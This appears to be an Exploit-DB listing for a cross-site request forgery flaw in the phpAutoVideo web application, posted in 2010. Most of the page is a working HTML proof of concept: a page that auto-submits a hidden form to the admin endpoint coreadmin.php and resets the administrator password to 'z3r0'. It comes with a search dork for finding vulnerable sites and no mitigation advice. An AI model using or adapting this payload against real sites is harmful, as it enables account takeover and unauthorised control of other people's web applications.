phpAutoVideo CSRF Vulnerability



EDB-ID: 11502 CVE: N/A OSVDB-ID: 62450
Author: GoLdeN-z3r0 Published: 2010-02-19 Verified: Not Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next 
##################################################################
#Exploit Title: phpAutoVideo csrf                                #
#SoftWare:https://secure.agaresmedia.com/v6/products/phpautovideo#
#Dork: Copyright Agares Media phpautovideo                       #
#Author: GoLdeN-z3r0                                             #
##################################################################
(-----------------------------------------------------------------)
 |                           PoC :                               |
(-----------------------------------------------------------------)
<html>
<body onload="document.registrationform.submit()">
<form action="http://[site]/admin/coreadmin.php" method="post" name="registrationform">
<input type="hidden" name="admintype" value="changepass">
<input type="hidden" name="passworda" value="z3r0">
<input type="hidden" name="passwordb" value="z3r0">
</form>
</body>
</html>






Comments

No comments so far